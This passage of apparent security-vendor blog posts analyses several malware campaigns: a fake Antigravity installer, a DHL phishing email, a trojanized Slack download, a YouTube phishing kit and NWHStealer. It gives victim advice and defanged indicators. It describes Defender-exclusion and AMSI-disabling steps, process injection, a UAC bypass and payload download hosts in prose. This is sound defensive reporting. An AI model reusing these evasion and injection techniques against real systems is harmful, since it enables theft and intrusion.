    Second, it widens the gap. A second Add-MpPreference block extends the exclusion list to include the .png file extension and the conhost.exe process—the exact two additions the next stage will need. It then writes AmsiEnable=0 into HKLM\Software\Policies\Microsoft\Windows Script\Settings, disabling Windows’ Antimalware Scan Interface—the layer that normally lets Defender read scripts before they execute. After this point, the malicious activity is being conducted in folders, with file types, and through processes that Defender has been instructed to ignore.

    Third, it stages persistence. It downloads a file called secret.png from https://captr.b-cdn[.]net/secret.png (a BunnyCDN URL that looks at a glance like any other content-delivery link) and saves it to C:\ProgramData\MicrosoftEdgeUpdate.png, a path chosen to sit beside Microsoft’s real browser-update folders. The file is not an image. It is an AES-256-CBC ciphertext (key and IV both derived via PBKDF2 with 10,000 iterations from a hardcoded passphrase) wrapping a .NET assembly. A scheduled task is then registered with the name MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}, which is all but indistinguishable at a glance from the real Microsoft Edge update task and set to fire at every logon, running unprivileged so it never produces a UAC prompt. The action it executes is conhost.exe --headless launching a hidden PowerShell, which decrypts the fake PNG in memory and reflectively loads the resulting .NET assembly into its own address space. Nothing lands on disk as an ordinary executable. All that persists is the encrypted image, in a folder Defender has been asked to ignore.

    And then a second payload, that doesn’t persist at all. The script doesn’t stop there. After registering and starting the scheduled task, it sends a second beacon to confirm install, then runs an entirely separate block that downloads a second encrypted file (GGn.xml) from the same BunnyCDN host, decrypts it with a different, hardcoded AES key, and reflectively loads that assembly into the running PowerShell process too. The first payload survives reboots; this one runs once, in memory, and is gone. Two .NET assemblies, one campaign, on the victim.

    What the payload is built to do

    The decrypted assembly is a .NET stealer. We can characterize it from its own class and method names, which describe its job in plain English: it scans browsers, messaging apps, gaming platforms, FTP clients, and crypto wallets, collecting data labeled Logins, Cookies, Autofills, and FtpConnections.

    In practice, that means every Chromium- and Firefox-based browser on the machine (Chrome, Edge, Brave, and others) gets stripped of saved passwords, autofill data (including saved credit cards), and the cookies that keep users signed in. Discord tokens, Telegram sessions, Steam logins, FTP credentials, and cryptocurrency wallet files are taken as well.

    (Most of the exact target paths are obfuscated and only decrypted at runtime, so the specific apps aren’t all visible from a static analysis, but the categories of theft are clear from the class names.)

    The trojanized Antigravity installer functions

    Session cookies are the part that should alarm most people, because they work faster than anything else. A stolen login cookie lets an attacker walk straight into a Gmail inbox or banking portal without needing a password or triggering two-factor authentication. As far as the website is concerned, the user is already signed in. The gap between infection and account takeover can be minutes.

    Beyond data theft, the malware also imports Windows APIs used for clipboard hijacking and keystroke logging, tools that can capture what you type or swap a cryptocurrency wallet address at the exact moment you send funds.

    It also includes the building blocks for “hidden desktop” tradecraft: creating a second, invisible Windows desktop that the attacker can capture and potentially control. In its most advanced form, this lets an attacker operate inside that hidden environment—logging in to accounts, approving transactions, or sending messages—while the victim’s real screen shows nothing unusual. For the duration of the infection, the attacker is, effectively, a second presence on the computer.

    A new tool, a new lookalike, the same trap

    The reason this campaign matters beyond the single installer is that its shape isn’t new. It’s a refined version of a pattern we’ve been watching for months: new AI products launch with huge attention, and within weeks, lookalike domains and trojanized installers appear alongside them. Antigravity is the latest example, but it won’t be the last.

    The incentive for attackers is obvious. Every high-profile AI launch creates a surge of users who want to try it immediately, before they’ve had time to memorize the real URL, or might fail to double-check it against trusted sources.


    Picked up something you shouldn’t have?


    What makes this style of campaign hard to spot is that most victims never know they were targeted. Those who escaped, because the operator chose not to escalate on their machine, have no reason to think anything happened.

    The ones who didn’t escape usually find out later: a password reset they didn’t request, a friend asking about a strange message, or a bank balance that suddenly looks wrong. By then, the decision to target them was made days earlier.

    What to do if you may have been affected

    If you or anyone who shares your computer recently installed something calling itself Google Antigravity from anywhere other than antigravity.google, start by checking the network indicators. Look in firewall logs, EDR alerts, or your router logs for connections to opus-dsn[.]com, captr.b-cdn[.]net, or 89[.]124[.]96[.]27. A single connection from a PowerShell process is enough to confirm the check-in happened.

    • From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Most services have a “sign out everywhere” option under security settings.
    • Change passwords on those accounts, starting with your email. If your email is compromised, an attacker can reset almost anything else.
    • Rotate any API keys, SSH keys, or cloud credentials that were on the affected computer, not just the passwords attached to them.
    • If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.
    • Watch your bank and credit card statements for unfamiliar charges, and consider placing a fraud alert with your bank.
    • Wipe and reinstall Windows. A machine that has run this class of malware should not be trusted.
    • If the machine is a work laptop, tell your IT or security team today. The beacon collects the machine’s Active Directory domain, so on a domain-joined corporate laptop, the attacker now knows which company’s network this victim belongs to, which means this isn’t just a personal problem.

    Indicators of Compromise (IOCs)

    File hashes (SHA-256)

    61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99 (Antigravity_v1.22.2.0.exe)

    Network indicators

    captr.b-cdn[.]net

    google-antigravity[.]com 

    opus-dsn[.]com

    89[.]124[.]96[.]27


    CNET Editors' Choice Award 2026

    “One of the best cybersecurity suites on the planet.” 

    According to CNET. Read their review


    •  

    “Your shipment has arrived” email hides remote access software

    An attachment in an email impersonating DHL about a shipment contains a link to a preconfigured SimpleHelp remote access tool—an ideal starting point for attackers to explore a network, steal data, and drop additional malware.

    A German industrial spare parts and equipment supplier received an email pretending to be from DHL, claiming a shipment had arrived.

    Screenshot of email pretending to be from DHL

    Given their line of business, I imagine they get this type of email all the time. But a few details stood out:

    • The sender’s email address did not belong to DHL,
    • the receiver address was the general info@ for the company,
    • the images in the email were hosted on ecp.yusercontent.com,  
    • and, most importantly, there was attachment.

    While the remote content is hosted on a legitimate Yahoo webpage commonly used to serve images and other content in Yahoo Mail, this is not something DHL typically uses.

    The attachment, a PDF file called AWB-Doc0921.pdf is just a blurred image with a Microsoft-branded button that prompts the victim to “Continue” to access a secure file.

    blurred content with a Continue button

    In reality, clicking the button downloads a file called AWB-Doc0921.scr from the domain longhungphatlogistics[.]vn, a domain belonging to a Vietnamese logistics company that was likely compromised to host malware.

    Malwarebytes blocks longhungphatlogistics[.]vn
    Malwarebytes blocks longhungphatlogistics[.]vn

    A .scr file is a Windows file, which is an executable (.exe) file used to launch screensavers. They are often used to hide malicious code because Windows trusts them, allowing them to bypass some security layers. 

    In this case, the file is a modified installer of a remote access tool signed by SimpleHelp.

    UAC prompt for the signed installer
    UAC prompt for the signed installer

    SimpleHelp is a remote support and remote monitoring and management (RMM) platform. It allows remote desktop control, file transfer, diagnostics, and unattended access. In the wrong hands, that’s effectively a support-style backdoor. Attackers can use it for reconnaissance, credential theft, lateral movement, defense evasion, and staging further malware, including ransomware. We’ve seen SimpleHelp abused in this way before.

    This is basically a beaconing model. Once installed, the system connects out to the attacker’s server, which is more likely to be allowed through NAT and firewalls than inbound connections. Because the user initiated the install, the attacker gets immediate visibility of the system and can reconnect later whenever the service is running. In the case of a phish, that means the lure only has to get the victim to execute the file once. After that, the attacker’s console can show the new machine as a manageable asset.

    For what seems to be a non-targeted attack, the campaign shows a decent level of sophistication by using legitimate components to trick targets into running the remote access tool.

    How to stay safe

    The good news: once you know what to look for, these attacks are much easier to spot and block. The bad news: they’re cheap, scalable, and will continue to circulate.

    So, the next time a “PDF” prompts you to download a file, pause to think about what might be hiding under the hood.

    Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

    • Only access your accounts through official apps or by typing the official website directly into your browser.
    • Check file extensions carefully. Even if a file installs a legitimate tool, it may not be safe to run it.
    • Enable multi-factor authentication for your critical accounts.
    • Use an up-to-date, real-time anti-malware solution with a web protection module.

    Pro tip: Malwarebytes Scam Guard recognized this email as a scam.


    Something feel off? Check it before you click.  

    Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

    Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

    Try it free → 

    •  

    A fake Slack download is giving attackers a hidden desktop on your machine

    A trojanized Slack download from a typosquatting website is giving attackers something most users wouldn’t even know to look for: a hidden desktop running on their machine.

    The installer looks legitimate and even launches a working copy of Slack. But in the background, it can create an invisible session where attackers can browse, access accounts, and interact with your system without anything appearing on your screen. To be clear, this campaign has nothing to do with Slack, the company, and we’ve let them know what we found.

    Slack has tens of millions of daily active users across more than 200,000 paying organisations in over 150 countries, including 77 of the Fortune 100. So a trojanized installer is not just a threat to the individual who runs it, but also to corporate networks, SSO-linked accounts, and internal communications.

    Everyone trusts the logo

    Website impersonating Slack
    Fake Slack website

    Slack is one of those apps that people install without a second thought. It sits alongside Chrome and Zoom in the pantheon of software that workers download on day one of a new job, often from a quick Google search rather than a bookmarked link. That’s what makes it such a compelling lure. The brand is instantly recognisable, the installer is something millions of people have run before, and the whole experience of watching it set up feels completely ordinary.

    The attackers behind this campaign registered the domain slacks[.]pro (note the extra “s” and the .pro top-level domain instead of .com). The site’s source code includes a JavaScript click handler that intercepts every click on the page and redirects the browser to a download hosted on a separate domain, debtclean-ua[.]sbs. The only clicks excluded are the cookie consent buttons; everything else triggers the download. This is not a true drive-by that exploits the browser silently, but it’s close enough: it requires just one click from a distracted user.

    What arrives on the victim’s desktop is a file named slack-4-49-81.exe, a name that mirrors Slack’s real version numbering closely enough that most people wouldn’t hesitate.

    JavaScript click handler
    JavaScript click handler

    This isn’t an obscure tactic. In August 2024, we documented a near-identical campaign using fraudulent Google Ads to redirect Slack searches to a malicious download page. Those attacks delivered SecTopRAT, a remote access Trojan with stealer capabilities.

    These campaigns keep coming back because the formula works: attackers take a trusted brand, register a convincing domain, and count on the fact that most people do not scrutinise a URL when they’re just trying to get set up for work.

    A real install and a hidden loader, running side by side

    Here’s what makes this particular sample clever: it doesn’t just pretend to install Slack. It actually installs a working copy of the application while simultaneously running a malware loader in the background. The victim sees a legitimate splash screen, watches Slack appear in their taskbar, and has no reason to suspect anything went wrong.


    Picked up something you shouldn’t have?


    Within seconds of being launched, slack-4-49-81.exe writes two temporary files to the user’s %TEMP% folder. The first, slack.tmp, is the decoy: a self-extracting Squirrel installer package. Squirrel is a legitimate, open-source update framework built into dozens of Electron apps including the real Slack, Discord, and Microsoft Teams. The dropper bundles a genuine copy of Squirrel’s Update.exe alongside a NuGet package called slack-4.49.81-full.nupkg, a branded splash image (background.gif), and a release manifest. When slack.tmp runs, it unpacks all of this into %LOCALAPPDATA%\SquirrelTemp, launches Update.exe with a standard --install flag, and from that point on, the Slack installation proceeds exactly as it would if the user had downloaded the app from slack.com. Slack opens, looks right, and works.

    The second file, svc.tmp, arrives seconds later. This is the loader: a separate ~519KB executable embedded inside the 150MB installer and extracted into %TEMP% alongside the decoy. It is unsigned, identifies itself in its portable executable (PE) metadata as Windows Component Update Service by Microsoft Corporation, and has no relationship to the Squirrel framework or the Slack application being installed next to it. Almost immediately it creates a small file called loader_log.txt in the temp folder, confirming the loader stage has started, and attempts to contact a command-and-control (C2) server at 94.232.46.16 on TCP port 8081.

    Meanwhile, the Squirrel installation completes and writes a registry Run key to survive reboots: value name com.squirrel.slack.slack under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. This is the exact key name and path that a legitimate Slack installation creates. An IT admin scrolling through autostart entries would see what looks like a normal Slack install and keep moving.

    Inside the loader: what static analysis reveals

    To understand what the loader is engineered to do once it has a C2 channel, we examined the binary directly. Its PE version information claims to be a Windows Component Update Service (internal name WinSvcUpd.exe), published by Microsoft Corporation, version 1.4.2.0. None of this is true. It’s a false flag designed to survive a glance in a process list or task manager.

    The binary is a 64-bit Windows executable compiled with MSVC. Its seven PE sections carry randomised names, like .7ssik, .d1npl, .m6zef, rather than the standard .text and .rdata produced by normal compilers, consistent with the use of a custom builder or crypter tool. Its import table is deliberately minimal: 90 functions from KERNEL32.dll and nothing else. There are no static imports for networking, registry access, or process manipulation. Instead, it resolves those APIs at runtime using GetProcAddress and LoadLibraryExW, a standard technique that hides the binary’s real capabilities from import-table analysis.

    PE sections
    PE sections

    What makes this sample unusual for a loader is how talkative it is internally. The binary is laced with debug strings that lay out its entire architecture, organised into labelled subsystems. These strings were never meant for the victim to see. They are developer diagnostics left in the build, and they tell us exactly what this tool was designed to do.

    Strings prefixed [P1] describe the first phase: the loader downloads a payload from its C2 ([P1] Downloading payload...). The download itself uses WinHTTP, resolved at runtime. The debug strings [HTTP] Connect, [HTTP] Send, and [HTTP] Recv trace the full request cycle, while [HTTP] winhttp unavailable reveals the fallback path if the library cannot be loaded. It stores the payload in shared memory via Windows file-mapping APIs ([P1] Payload in shared memory), and launches a second copy of itself as Phase 2 ([P1] Phase-2 launched). Phase 2 reads the payload from shared memory ([P2] Payload copied from shared memory) and decrypts it. The strings [CRYPT] Decrypting... and [CRYPT] MZ OK confirm the payload arrives encrypted and is validated as a Windows executable after decryption. The decrypted DLL is written to disk under a filename matching the pattern wmiprvse_*.tmp, designed to blend in with temporary files created by the legitimate Windows WMI Provider Host.

    The loader is then designed to call a specific exported function from the decrypted DLL: HvncRun. The strings [LOAD] Calling HvncRun... and --- HvncClient log --- identify the payload as an HVNC client, a Hidden Virtual Network Computing tool. HVNC differs from a conventional remote access Trojan in a critical way: it creates a completely separate, invisible desktop session on the victim’s machine. The attacker can open browsers, access banking portals, and interact with authenticated sessions without anything appearing on the user’s visible screen. It’s a tool primarily associated with financial fraud operations.

    To run the HVNC payload covertly, the loader is equipped to inject the DLL into explorer.exe using a technique known as section-based injection. The strings [INJ] === Section-based injection into explorer.exe === and [INJ] Remote thread created in explorer.exe! describe a sequence in which the loader creates a shared memory section via NtCreateSection, maps it into both its own process and the Windows shell, writes shellcode and the DLL path into the shared region, and starts a remote thread via NtCreateThreadEx. This is a harder-to-detect variant of process injection than the classic WriteProcessMemory approach, because it avoids writing directly into the target’s memory space. If the NT APIs are unavailable, the loader falls back to writing the DLL to disk and loading it directly ([INJ] Required NT APIs not available, falling back to DropAndLoad).

    Strings

    The binary includes active anti-analysis defences. The string [AA] Debugger/sandbox detected indicates it checks for observation and alters its behaviour accordingly. It has the tools to do so: IsDebuggerPresent and GetTickCount appear in the import table, commonly used for debugger detection and timing-based sandbox evasion, though both are also standard CRT imports in any MSVC-compiled binary. The debug string is the stronger signal that these APIs are used intentionally.

    What this means for someone who ran it

    If you downloaded Slack from anywhere other than slack.com recently, particularly from a domain ending in .pro, or one that auto-downloaded a file when you clicked anywhere on the page, take it seriously.

    The loader attempts to reach its C2 server before the Slack window finishes loading. It is engineered to use that connection (if established) to download and decrypt an HVNC payload and inject it into explorer.exe to operate from within the Windows shell itself. The Squirrel installation writes the same Run key that a legitimate Slack install would, so the autostart entry is indistinguishable from a clean machine. Meanwhile, the loader only needs to succeed once: if it downloads the HVNC payload and injects it into explorer.exe during the initial execution, the attacker has a foothold that lasts until the next reboot. Whether additional persistence for the payload exists depends on the C2 operator’s next moves.

    How to stay safe

    This campaign is a case study in how much engineering effort goes into looking ordinary. One code path installs real software through a legitimate framework. The other runs a multi-phase loader with dynamic API resolution, encrypted payload delivery, process injection into the Windows shell, and anti-analysis defences, all packed into a binary that identifies itself as a Microsoft service. The decoy hides what’s going on, while the loader gives the attacker a foothold.

    Bookmark the real download pages for the software you use. If you find yourself Googling “Slack download” and clicking the first result that looks right, you’re exactly the person this campaign was built to catch.

    • Only download Slack from the official site. Go directly to slack.com or use a trusted bookmark. Avoid clicking ads or unfamiliar links.
    • Check the URL carefully. Look for subtle changes like extra letters or unusual domains (for example, “.pro” instead of “.com”).
    • Be wary of sites that trigger downloads on click. If a page starts downloading a file when you click anywhere, close it.
    • Verify the installer before running it. Right-click the file, check its properties, and look for a valid digital signature.
    • Use real-time security protection. A security tool can block known malicious domains and catch suspicious behavior during installation.
    • Watch for unusual behavior after installing software. Unexpected network activity, slowdowns, or unknown processes are worth investigating.
    • If something feels off, act quickly. Disconnect from the internet, run a full scan, and change your passwords from a clean device, especially for email, banking, and work accounts.

    What to do if you may have been affected

    • Disconnect from the network immediately to sever any active C2 session.
    • Run a full scan with Malwarebytes.
    • Change all passwords for accounts you have accessed from this machine. Do this from a different, clean device. Prioritise email, banking, and SSO accounts.
    • If this was a work machine, notify your IT or security team immediately.

    Indicators of Compromise (IOCs)

    File hashes (SHA-256)

    cfd2e466ea5ac50f9d9267f3535a68a23e4ff62e3fe3e20a30ec52024553c564 (slack-4-49-81.exe)

    08fd0a82cdeb0a963b7416cf57446564dfed5de5c6f66dee94b36d28bfefec9d (svc.tmp)

    Distribution

    slacks[.]pro

    debtclean-ua[.]sbs

    Network indicators

    94.232.46.16:8081


    CNET Editors' Choice Award 2026

    “One of the best cybersecurity suites on the planet.” 

    According to CNET. Read their review


    •  

    Fake YouTube copyright notices can steal your Google login

    A convincing phishing campaign is going after YouTube creators, and if it works, attackers don’t just steal your Google login. They can take over your entire Google account, including Gmail, your files, and payments, then hijack your YouTube channel and use your audience to run scams.

    The lure is a fake copyright strike notification that’s so convincing even security-aware users could fall for it. The attack site pulls in your real channel data, such as your profile picture, subscriber count, and latest video, to build a personalized scare page. It funnels you toward a sign-in page designed to steal your Google account.

    The operation runs like a franchise: multiple attackers share the same platform, each running their own campaigns against different creators.

    Why your YouTube channel is worth more than you think

    For full-time creators, a YouTube channel isn’t just a hobby, it’s a business. It generates revenue through ads, sponsorships, and merchandise. And it all sits behind a single Google login that also controls your Gmail, Google Drive, and payment details.

    That’s what makes creators such attractive targets. Attackers who hijack a channel often rebrand it within minutes, typically to impersonate a cryptocurrency company, and use the existing audience to livestream scams. The original creator gets locked out and watches their years of work being used to defraud their own subscribers.

    A copyright strike is the perfect bait because it exploits the one thing creators fear most: losing their channel overnight.

    “Check your Youtube copyright status instantly”

    The campaign runs from a site called dmca-notification[.]info. The browser tab reads “Youtube | Copyright strikes,” and the page itself looks clean and professional, complete with YouTube logo, search bar, and helpful instructions.

    "Check Your Youtube Copyright Status Instantly"

    It invites you to enter your channel name, @handle, or video link to check your copyright status. Nothing about it stands out as immediately suspicious.

    Each phishing link includes the target’s channel handle directly in the URL, so the page already knows who you are before you type anything.

    The source code contains a tracking flag called suppressTelegramVisit, which changes how visits are logged depending on whether an affiliate parameter is present. This suggests the operators may be coordinating traffic through Telegram, although the kit could be distributed through any platform.

    Your own videos, used against you

    "Loading information to channel"

    Once the page has your channel name, it fetches real data from YouTube: your avatar, subscriber count, video count, and your most recent upload (including its title, thumbnail, and view count). That information is then used to build a fake copyright complaint.

    You see your own branding alongside a claim that a specific segment of your latest video has been flagged for copyright infringement. The timestamps are dynamically generated for each victim based on the video’s length, making each notice look unique and legitimate. It’s similar to receiving a fake legal notice that includes your real home address. The personal details make it harder to dismiss as spam.

    “Respond within three days or face enforcement actions”

    "Deleting the video will not remove the strike"

    The page piles on the pressure. A warning tells you that deleting the video won’t remove the strike. A red notice threatens that if you don’t respond within three days, your channel will face enforcement actions. The proposed fix is simple: sign in with Google to verify you’re the channel owner, and the claim will be resolved within 24 hours.

    Every element on the page is designed to push you toward the “Login via Google” button before you stop to think.

    The sign-in page that steals your account

    When you click that button, the site contacts its own backend server to fetch the address of an external phishing page, one that the attacker can swap out to a new domain at any time.

    In observed traffic, the request to /api/get-active-domain returned the domain blacklivesmattergood4[.]com, which was then loaded inside a full-screen overlay on top of the copyright notice page.

    What appears next is a classic Browser-in-the-Browser attack: a fake Chrome pop-up rendered entirely in HTML and CSS. It includes a title bar reading “Sign in – Google Accounts – Google Chrome,” a padlock icon, and a URL that looks like accounts.google.com. None of it is real. They’re all just graphics. The only real address bar is the one at the top of your actual browser, which still shows dmca-notification[.]info.

    Inside the fake window sits a convincing replica of Google’s sign-in page. It looks exactly like the real thing, but every keystroke goes to the attacker.

    Fake Google sign-in

    Traffic capture also showed attempts to contact additional domains—dopozj[.]net, ec40pr[.]net, and xddlov[.]net—which returned 502 errors at the time of capture. These may be backup infrastructure or credential relay servers that were offline.

    The rotating-domain approach is what makes this campaign resilient. The phishing domain is fetched in real time with no caching, allowing attackers to rotate infrastructure quickly. If one domain is taken down, the next victim is sent to a new one.

    Once credentials are entered, the overlay closes and the victim is returned to the copyright notice page with no confirmation or error . It gives the attacker time to use the stolen credentials before the victim realizes anything happened.

    Big channels get a free pass (on purpose)

    One interesting detail: the kit checks whether the target channel has more than three million subscribers. If it does, the entire phishing flow is skipped. Instead of the copyright strike warning and login button, the page shows a benign message: “Your channel is in good standing. No further action is needed.”

    This is almost certainly an evasion tactic. Very large channels are more likely to have dedicated security teams, relationships with YouTube’s trust and safety staff, or the visibility to trigger a rapid takedown if they publicly report the scam. By automatically exempting them, the kit reduces the risk of drawing attention from exactly the people most capable of getting the operation shut down.

    Not just one scammer

    The source code reveals that this isn’t a single phishing page run by one person. The kit includes an affiliate tracking system where each attacker gets their own ID embedded in the phishing links they send out. A central backend tracks which operator delivered which victim and how far each target got through the funnel. Our traffic capture confirms this: the phishing link included a referral ID (ref=huyznaetdmca), the default affiliate tag, which appears to be a transliteration of a Russian phrase. Brand names like Google and YouTube are also written with lookalike Cyrillic characters in the source code to evade automated security scanners.

    In short, this is phishing-as-a-service: a shared platform that multiple attackers can use to run campaigns against YouTube creators at scale.

    How to protect yourself

    This campaign is a reminder that phishing has moved far beyond badly spelled emails from a Nigerian prince. Today’s phishing kits are professionally engineered platforms with rotating infrastructure, real-time personalization, and franchise-style distribution.

    For YouTube creators, the key rule is simple: copyright strikes only appear in YouTube Studio.

    If you get a warning anywhere else, treat it as suspicious.

    • Be wary of urgency. Real copyright processes don’t rush you into action
    • Go directly to studio.youtube.com or through trusted channels to check your status
    • Never sign in through a link in an email or message

    Spot a fake browser window

    • Try dragging it: A real window moves freely. A fake one is stuck inside the page
    • Minimize your browser: A real pop-up stays open. A fake one disappears
    • Check the URL: If you can’t interact with it, it’s just an image

    Even if everything looks right, always check the actual address bar before entering your username and password.

    If you’ve already entered your details, act quickly:

    • Change your Google password immediately
    • Revoke active sessions in your account security settings
    • Check your YouTube channel for unauthorized changes

    Indicators of Compromise (IOCs)

    Domain

    • dmca-notification[.]info (primary phishing site)
    • blacklivesmattergood4[.]com (credential harvesting domain — active at time of capture)
    • dopozj[.]net (associated infrastructure — 502 at time of capture)
    • ec40pr[.]net (associated infrastructure — 502 at time of capture)
    • xddlov[.]net (associated infrastructure — 502 at time of capture)

    Something feel off? Check it before you click.  

    Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

    Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

    Try it free → 

    •  

    From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

    We’ve uncovered multiple campaigns distributing an infostealer we track as NWHStealer, using everything from fake VPN downloads to hardware utilities and gaming mods. What makes this campaign stand out isn’t just the malware, but how widely and convincingly it’s being spread.

    Once installed, it can collect browser data, saved passwords, and cryptocurrency wallet information, which attackers may use to access accounts, steal funds, or carry out further attacks.

    We detected multiple campaigns using different platforms and lures to distribute NWHStealer. The stealer is loaded and executed in several ways, such as self-injection or injection into other processes like RegAsm (Microsoft’s Assembly Registration Tool). Often, additional wrappers such as MSI or Node.js are used as the initial loader.

    The stealer is distributed using lures (what the file claims to be) such as:

    • VPN installers
    • Hardware utilities (e.g. OhmGraphite, Pachtop, HardwareVisualizer, Sidebar Diagnostics)
    • Mining software
    • Games, cheats, and mods (e.g. Xeno)

    It’s hosted or shared across multiple distribution channels, including:

    • Fake websites impersonating legitimate services, like Proton VPN
    • Code hosting platforms like GitHub and GitLab
    • File hosting services such as MediaFire and SourceForge
    • Links and redirects from gaming- and security-related YouTube videos

    Although there are many distribution methods, in this blog we look at two cases:

    • Case 1: A free web hosting provider distributing a malicious ZIP file that loads the stealer using self-injection
    • Case 2: Fake websites that load the stealer using DLL hijacking and injection into the RegAsm process

    Case 1: Free web hosting provider distributes the stealer

    The first case is the most unexpected. We found that a free web hosting provider, onworks[.]net, hosts ZIP files in its download section that ultimately distribute the stealer.

    The website, ranked in the top 100,000, allows users to run virtual machines entirely in the browser.

    Virtual machine running in the browser
    Virtual machine running in the browser

    Through this site, users download a malicious ZIP with names like:

    • OhmGraphite-0.36.1.zip
    • Sidebar Diagnostics-3.6.5.zip
    • Pachtop_1.2.2.zip
    • HardwareVisualizer_1.3.1.zip
    One of the pages that downloads the malicious archive
    One of the pages that downloads the malicious archive

    In this case, the malicious code responsible for loading the stealer is embedded in the executable, for example HardwareVisualizer.exe.

    The loader that starts the infection chain
    The loader that starts the infection chain

    The loader contains junk code to make analysis more difficult and performs several operations, including:

    • Checking the environment for analysis tools and terminating if detected
    • Implementing a custom decryption function for strings
    • Resolving functions using LoadLibraryA and GetProcAddress
    • Decrypting and loading the next stage using AES-CBC via BCrypt APIs

    This isn’t the only way the stealer is distributed. We found similar lures, with the same ZIP names, that instead distribute the stealer via DLL hijacking.

    In this case, HardwareVisualizer.exe is actually the WinRAR executable, and the malicious code resides in WindowsCodecs.dll.

    The WinRAR executable with the malicious DLL
    The WinRAR executable with the malicious DLL

    While tracking the DLL loader, we also saw it distributed in other campaigns with different lures. For example, in the second case analyzed, this malicious DLL is delivered through fake websites.

    Case 2: Fake Proton VPN website and DLL loader

    In the second case, we detected a website impersonating Proton VPN that delivers a malicious ZIP. This archive executes the stealer using DLL hijacking or an MSI file. To be clear, this has no affiliation with Proton VPN, and we’ve contacted them to let them know what we found.

    Links to the website appear in several compromised YouTube channels, along with AI-generated videos demonstrating the installation process:

    • Youtube channels with malicious Proton VPN links.
    • Youtube channels with malicious Proton VPN links.
    • Youtube channels with malicious Proton VPN links.
    • Youtube channels with malicious Proton VPN links.
    • Youtube channels with malicious Proton VPN links.
    • Youtube channels with malicious Proton VPN links.
    Fake website distributes the stealer via DLL hijacking
    Fake website distributes the stealer via DLL hijacking
    Folders containing the malicious DLL
    Folders containing the malicious DLL 

    In other infection chains, this DLL appears under different names, such as:

    • iviewers.dll
    • TextShaping.dll
    • CrashRpt1403.dll

    This DLL decrypts two embedded resources. The decryption method varies between samples: Some use custom AES implementations, while others rely on the OpenSSL library.

    One of the decrypted resources is a second-stage DLL, runpeNew.dll, which is loaded and executed via the GetGet method.

    The second-stage DLL starts a process (such as RegAsm) and performs process hollowing using low-level APIs, including:

    • NtProtectVirtualMemory
    • NtCreateUserProcess
    • NtUnmapViewOfSection
    • NtAllocateVirtualMemory
    • NtResumeThread

    The final payload: NWHStealer

    At the end of these infection chains, the attacker deploys NWHStealer. The stealer runs directly in memory or injects itself into other processes such as RegAsm.exe.

    It enumerates more than 25 folders and registry keys associated with cryptocurrency wallets.

    Enumeration phase of wallets
    Enumeration phase of wallets

    The stealer also collects and exfiltrates data from multiple browsers, including Edge, Chrome, Opera, 360 Browser, K-Melon, Brave, Chromium, and Chromodo.

    Enumeration of browser folders.
    Enumeration of browser folders
    Enumeration of browser extensions.
    Enumeration of browser extensions

    Additionally, it injects a DLL into browser processes such as msedge.exe, firefox.exe, or chrome.exe. This DLL extracts and decrypts browser data before sending it to the command-and-control (C2) server.

    The injected DLL in Microsoft Edge
    The injected DLL in Microsoft Edge 

    The injected DLL also executes a PowerShell command that:

    • Creates hidden directories in LOCALAPPDATA
    • Adds those directories to Windows Defender exclusions
    • Forces a Group Policy update
    • Encrypts a getPayload request and sends it to the C2
    • Receives and executes additional payloads disguised as system processes (e.g., svchost.exe, RuntimeBroker.exe)
    • Creates scheduled tasks to run the payload at user logon with elevated privileges

    Data sent to the C2 is encrypted using AES-CBC. If the primary server is unavailable, the malware can retrieve a new C2 domain via a Telegram-based dead drop.

    Dead drop resolver via Telegram
    Dead drop resolver via Telegram
    JSON containing various information about the compromised system
    JSON containing various information about the compromised system

    The stealer also uses a known CMSTP User Account Control (UAC) bypass technique to execute PowerShell commands:

    • Generates a random .inf file in the temp folder
    • Uses cmstp.exe to elevate privileges
    • Automatically confirms the prompt using Windows APIs

    How to stay safe

    Instead of relying on phishing emails or obvious scams, the attackers behind this campaign are hiding malware inside tools people actively search for and trust. By spreading through platforms like GitHub, SourceForge, and YouTube, they increase the chances that users will let their guard down.

    Once installed, the impact can be serious. Stolen browser data, saved passwords, and cryptocurrency wallet information can lead to account takeovers, financial loss, and further compromise.

    Here are our tips for avoiding being caught out:

    • Download software only from official websites
    • Be cautious with downloads from GitHub, SourceForge, or file-sharing platforms unless you trust the source
    • Check file signatures and publisher details before running anything
    • Avoid downloading tools from links in YouTube descriptions
    • Pro tip: Install Malwarebytes Browser Guard on your browser to block malicious URLs.

    Indicators of Compromise (IOCs)

    Check the signature and version of software in suspicious archives.

    Hashes

    e97cb6cbcf2583fe4d8dcabd70d3f67f6cc977fc9a8cbb42f8a2284efe24a1e3

    2494709b8a2646640b08b1d5d75b6bfb3167540ed4acdb55ded050f6df9c53b3

    Domains

    vpn-proton-setup[.]com (fake website)

    get-proton-vpn[.]com (fake website)

    newworld-helloworld[.]icu (C2 domain)

    https://t[.]me/gerj_threuh (Telegram dead drop)

    URLS

    https://www.onworks[.]net/software/windows/app-hardware-visualizer

    https://sourceforge[.]net/projects/sidebar-diagnostics/files/Sidebar%20Diagnostics-3.6.5.zip

    https://github[.]com/PieceHydromancer/Lossless-Scaling-v3.22-Windows-Edition/releases/download/Fps/Lossless.Scaling.v3.22.zip

    This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious URLs.

    •  

    That “job brief” on Google Forms could infect your device

    We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial document, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).

    It’s not the malware that’s new, but how the attack starts.

    Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.

    What is PureHVNC?

    PureHVNC is a modular .NET RAT from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information.

